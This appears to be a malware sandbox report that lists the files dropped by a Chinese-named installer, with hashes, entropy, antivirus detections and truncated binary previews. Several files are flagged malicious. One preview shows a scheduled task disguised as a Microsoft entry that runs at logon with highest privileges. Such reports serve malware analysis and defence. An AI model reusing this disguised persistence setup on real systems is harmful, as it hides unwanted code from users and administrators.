                                      SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                      SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                      Malicious:false
                                      Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):74960
                                      Entropy (8bit):7.997593701656546
                                      Encrypted:true
                                      SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                      MD5:059BA7C31F3E227356CA5F29E4AA2508
                                      SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                      SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                      SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                      Malicious:false
                                      Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653607
                                      Encrypted:true
                                      SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                      MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                      SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                      SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                      SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                      Malicious:false
                                      Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):29730
                                      Entropy (8bit):7.994290657653608
                                      Encrypted:true
                                      SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                      MD5:A9C8A3E00692F79E1BA9693003F85D18
                                      SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                      SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                      SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                      Malicious:false
                                      Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:7-zip archive data, version 0.4
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.99927430870047
                                      Encrypted:true
                                      SSDEEP:6144:5ca7IDBMN0AXMgKXYYoAGThkbN0lJyx7cLoHAd0cWkkoUEXU2bO:Z7IDC9mb1+WN0Dyhwh0cWloUP2bO
                                      MD5:D129E17A30F3E99E49E639655EB5DEB2
                                      SHA1:302C332A978CB967E95F2B54A713BD1D2F72A131
                                      SHA-256:BE38AB40C78A620589239D5111CD51FFF82D4930C7CB296F579936ADFD2AB05A
                                      SHA-512:39A5F12F479357D0FC8EE5CC23EB1030C152C2FCB673B2FA7675D6C2BE9B5F3C0B2221825CF7BBF551E48D9957ECA21B43394B24812EEEDD8DAB3204DCE79341
                                      Malicious:false
                                      Preview:7z..'......z .......@...........B..(-L"3sS..#..U\..C.]ECa .u%.\.../3a.....=.uK......fO?E..\B.?.2.g.....\d.^(;F$F.....g...{.....nb.~1.....6.,...E.-.b...$Gz/..Qe.......}..a.yI.Nfl......<.\.. ....1.'>..Ex......g.|{......d.@.r...l....w...=k`.`.Mur....k...&".H*......FJ........-R2...:.2V....g7...:"*N..O8..q.9z.9.G..z..>.H....@.;........Hb..}.....{.T.I.s......,......p.B....P.+..j.W."JO.-J..Z ...Vh...%..L.r."z..@tb.(gi....h2...R.X....F.x.cG.....%JaU,.$...d.....".i..|...<..v...>....hf.#.8.. (.3$.x.....l..l..h|%7.S..i.L#L..P.d7Gr...{./.r.o...k.....9..S[...}.KbH.y..\.Qq.uo.O.+Z.Z......G....=@a.*@.M.r......sR...^....d..w.oM&d..&N..?.L`h.`J.~,>.;....)A@..(.......k..T.A9.{V4.......0,.0..<...2.}:..cF.....Q.K\ 6w.....>.+1.#k.P.`.+.d.?.S...{.[........`4.D...R..xo..z...<[.A.w.C.=?..&.!..O.......u4.b...o6..x....J.../...W...t...>i...AN.`..Us>k..y30j..v.......2R.T...6Q.0. V.v.}..l.._...?..b.l..|;..jf....0.......dR.`._....j.i...'.'.....Iy.3S.q.'k.@....o......
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):63640
                                      Entropy (8bit):6.482810107683822
                                      Encrypted:false
                                      SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                      MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                      SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                      SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                      SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 9%
                                      • Antivirus: Virustotal, Detection: 4%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):3.347329250663303
                                      Encrypted:false
                                      SSDEEP:48:dXKLzDlnbL6w0QldOVQOj933ODOiTdKbKsz72eW+5y9:dXazDlnKwhldOVQOj6dKbKsz7
                                      MD5:0B22A2EDD065A1C81E971548277C256F
                                      SHA1:E8C9021B2A56BD2845B2E4322A77755AE12FE197
                                      SHA-256:C45C719A48CE574E67FDA9B816E972913BDCC33A5B414DFC9A31E5B55118E50B
                                      SHA-512:8D36C6B062EB505CCF3B2E69307FD2526D8FD0D6DA411E8E26266ACC7DFD4B7330B01CF7161F0F8CB6B75C547A3F15525EF5DC18BB25BE34B214522D24942E95
                                      Malicious:false
                                      Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvai
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                      Category:dropped
                                      Size (bytes):5649408
                                      Entropy (8bit):6.392614480390128
                                      Encrypted:false
                                      SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                      MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                      SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                      SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                      SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1628158735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllulvh2th:NllUE
                                      MD5:1C6FEFD3AEFA5BA7595E7FC2E4284A86
                                      SHA1:1061961FD8D9427258B32E58594747A9009930B7
                                      SHA-256:AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
                                      SHA-512:03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
                                      Malicious:false
                                      Preview:@...e.................................~..............@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530549308235048
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3366912
                                      Entropy (8bit):6.530549308235048
                                      Encrypted:false
                                      SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                      MD5:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      SHA1:C89AAFB9E83EF08F32610D12C15840E3ADD3DD06
                                      SHA-256:15B6D6F84E5D1A01AE0493EF947045BE2759BF942C603F89A5CD40E01C8894D0
                                      SHA-512:0E0CE33F8A70E16753FFA8CB37D60998AB4E2D588E4C661C08568678615D473F6391B5E828B203C3DA5423FD71ABDFF322EDBAFF4273867F30C9A42E6523E99C
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................
                                      Process:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584000
                                      Entropy (8bit):7.00283805408099
                                      Encrypted:false
                                      SSDEEP:49152:E7vv7WClWZ7sR4YW+AKb+JE/zEVa9BKRe71MzuiehWIKxZFh2GSTujbNMLC+z/gQ:E7H77lWrYW+X4Va9BKRe71MzSRi6yQ
                                      MD5:4DB75814BF4A212D3AEBA5831C059402
                                      SHA1:3674F7371C875A8E338C3374D5C5B58420944C55
                                      SHA-256:5FB9A89D21C3DD25609F2CA92B3944264226065CD8DC13736E9B316951FB9256
                                      SHA-512:290931B408148D7B6D513A3CE91628827E8469BDE9CDFEC58499ED38AC0023A4AD11B7FD0068FDC91D683A87BBBA7338338582B0D5AAF7351BE155986035E3BC
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 13%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg...........!.....P..........E........................................ 7...........@.........................H#.......*..<.....6.X.....................6.d?..........................x.......................+...............................text....O.......P.................. ..`.rdata..<....`.......T..............@..@.data........`.......J..............@....00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....voltbl.F....`(.......(..................j)q.....X...p(..Z....(............. ..`.rsrc...X.....6......j6.............@..@.reloc..d?....6..@...p6.............@..B................................................................................................................................................................................................................................................................................
                                      Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):406
                                      Entropy (8bit):5.117520345541057
                                      Encrypted:false
                                      SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                      MD5:9200058492BCA8F9D88B4877F842C148
                                      SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                      SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
